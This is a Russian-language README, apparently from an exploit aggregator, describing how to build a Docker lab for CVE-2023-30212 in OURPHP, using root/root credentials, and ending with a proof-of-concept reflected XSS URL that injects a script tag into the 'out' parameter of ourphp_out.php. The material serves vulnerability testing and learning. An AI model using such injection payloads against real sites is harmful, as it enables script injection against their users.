## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AASH035-CVE-2023-30212
# НАСТРОЙКА ЛАБОРАТОРИИ CVE-2023-30212
**Предварительные требования**
Загрузить docker.io
`sudo apt install -y docker.io`
ШАГИ
1. Загрузите все файлы из моего репозитория с помощью приведенной ниже команды.
`git clone https://github.com/AAsh035/CVE-2023-30212.git`
2. Теперь для создания образа docker выполните следующую команду:
`sudo docker build -t vuln .`
3. Далее преобразуйте образ docker в контейнер. Контейнер должен работать на порту 80. Команда:
`sudo docker run -d -p 80:80 vuln`
4. Чтобы проверить, запущен ли контейнер, используйте команду:
`sudo docker ps`
5. Введите 127.0.0.1 в браузере, и загрузится страница OURPHP.
6. Необходимо настроить ourphp, указав следующее:
Имя пользователя : root
Пароль : root
Имя базы данных: vuln
7. Теперь необходимо настроить имя пользователя и пароль для администратора. Укажите следующее:
Имя пользователя: root
Пароль: root
8. Скопируйте приведенную ниже ссылку и вставьте ее в браузер:
`http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>`
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0